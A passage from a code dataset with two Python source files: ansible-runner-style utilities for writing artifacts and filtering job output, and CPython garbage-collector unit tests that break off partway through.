source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
utils.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
import zipfile
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import BytesIO, StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def stream_dir(directory):
buf = BytesIO()
with zipfile.ZipFile(buf, 'w', compression=zipfile.ZIP_DEFLATED, allowZip64=True) as archive:
if directory:
for dirpath, dirs, files in os.walk(directory):
relpath = os.path.relpath(dirpath, directory)
if relpath == ".":
relpath = ""
for fname in files:
archive.write(os.path.join(dirpath, fname), arcname=os.path.join(relpath, fname))
archive.close()
payload = buf.getvalue()
return b'\n'.join((json.dumps({'zipfile': len(payload)}).encode('utf-8'), payload))
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path,old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys() :
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
|
test_gc.py
|
import unittest
import unittest.mock
from test.support import (verbose, refcount_test, run_unittest,
cpython_only, start_threads,
temp_dir, TESTFN, unlink,
import_module)
from test.support.script_helper import assert_python_ok, make_script
import gc
import sys
import sysconfig
import textwrap
import threading
import time
import weakref
try:
from _testcapi import with_tp_del
except ImportError:
def with_tp_del(cls):
class C(object):
def __new__(cls, *args, **kwargs):
raise TypeError('requires _testcapi.with_tp_del')
return C
try:
from _testcapi import ContainerNoGC
except ImportError:
ContainerNoGC = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
@with_tp_del
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __tp_del__(self):
pass
if sysconfig.get_config_vars().get('PY_CFLAGS', ''):
BUILD_WITH_NDEBUG = ('-DNDEBUG' in sysconfig.get_config_vars()['PY_CFLAGS'])
else:
# Usually, sys.gettotalrefcount() is only present if Python has been
# compiled in debug mode. If it's missing, expect that Python has
# been released in release mode: with NDEBUG defined.
BUILD_WITH_NDEBUG = (not hasattr(sys, 'gettotalrefcount'))
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
@cpython_only
def test_legacy_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A:
def __tp_del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@cpython_only
def test_legacy_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
@with_tp_del
class A(object):
def __tp_del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = []
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
with start_threads(threads, lambda: exit.append(1)):
time.sleep(1.0)
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
class UserInt(int):
pass
# Base class is object; no extra fields.
class UserClassSlots:
__slots__ = ()
# Base class is fixed size larger than object; no extra fields.
class UserFloatSlots(float):
__slots__ = ()
# Base class is variable size; no extra fields.
class UserIntSlots(int):
__slots__ = ()
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked(UserInt()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
self.assertTrue(gc.is_tracked(UserClassSlots()))
self.assertTrue(gc.is_tracked(UserFloatSlots()))
self.assertTrue(gc.is_tracked(UserIntSlots()))
def test_is_finalized(self):
# Objects not tracked by the always gc return false
self.assertFalse(gc.is_finalized(3))
storage = []
class Lazarus:
def __del__(self):
storage.append(self)
lazarus = Lazarus()
self.assertFalse(gc.is_finalized(lazarus))
del lazarus
gc.collect()
lazarus = storage.pop()
self.assertTrue(gc.is_finalized(lazarus))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_bug21435(self):
# This is a poor test - its only virtue is that it happened to
# segfault on Tim's Windows box before the patch for 21435 was
# applied. That's a nasty bug relying on specific pieces of cyclic
# trash appearing in exactly the right order in finalize_garbage()'s
# input list.
# But there's no reliable way to force that order from Python code,
# so over time chances are good this test won't really be testing much
# of anything anymore. Still, if it blows up, there's _some_
# problem ;-)
gc.collect()
class A:
pass
class B:
def __init__(self, x):
self.x = x
def __del__(self):
self.attr = None
def do_work():
a = A()
b = B(A())
a.attr = b
b.attr = a
do_work()
gc.collect() # this blows up (bad C pointer) when it fails
@cpython_only
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
import _testcapi
@_testcapi.with_tp_del
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __tp_del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout, b"")
return stderr
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
def test_global_del_SystemExit(self):
code = """if 1:
class ClassWithDel:
def __del__(self):
print('__del__ called')
a = ClassWithDel()
a.link = a
raise SystemExit(0)"""
self.addCleanup(unlink, TESTFN)
with open(TESTFN, 'w') as script:
script.write(code)
rc, out, err = assert_python_ok(TESTFN)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
def test_freeze(self):
gc.freeze()
self.assertGreater(gc.get_freeze_count(), 0)
gc.unfreeze()
self.assertEqual(gc.get_freeze_count(), 0)
def test_get_objects(self):
gc.collect()
l = []
l.append(l)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=0)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=1)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=2)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
del l
gc.collect()
def test_get_objects_arguments(self):
gc.collect()
self.assertEqual(len(gc.get_objects()),
len(gc.get_objects(generation=None)))
self.assertRaises(ValueError, gc.get_objects, 1000)
self.assertRaises(ValueError, gc.get_objects, -1000)
self.assertRaises(TypeError, gc.get_objects, "1")
self.assertRaises(TypeError, gc.get_objects, 1.234)
def test_resurrection_only_happens_once_per_object(self):
class A: # simple self-loop
def __init__(self):
self.me = self
class Lazarus(A):
resurrected = 0
resurrected_instances = []
def __del__(self):
Lazarus.resurrected += 1
Lazarus.resurrected_instances.append(self)
gc.collect()
gc.disable()
# We start with 0 resurrections
laz = Lazarus()
self.assertEqual(Lazarus.resurrected, 0)
# Deleting the instance and triggering a collection
# resurrects the object
del laz
gc.collect()
self.assertEqual(Lazarus.resurrected, 1)
self.assertEqual(len(Lazarus.resurrected_instances), 1)
# Clearing the references and forcing a collection
# should not resurrect the object again.
Lazarus.resurrected_instances.clear()
self.assertEqual(Lazarus.resurrected, 1)
gc.collect()
self.assertEqual(Lazarus.resurrected, 1)
gc.enable()
def test_resurrection_is_transitive(self):
class Cargo:
def __init__(self):
self.me = self
class Lazarus:
resurrected_instances = []
def __del__(self):
Lazarus.resurrected_instances.append(self)
gc.collect()
gc.disable()
laz = Lazarus()
cargo = Cargo()
cargo_id = id(cargo)
# Create a cycle between cargo and laz
laz.cargo = cargo
cargo.laz = laz
# Drop the references, force a collection and check that
# everything was resurrected.
del laz, cargo
gc.collect()
self.assertEqual(len(Lazarus.resurrected_instances), 1)
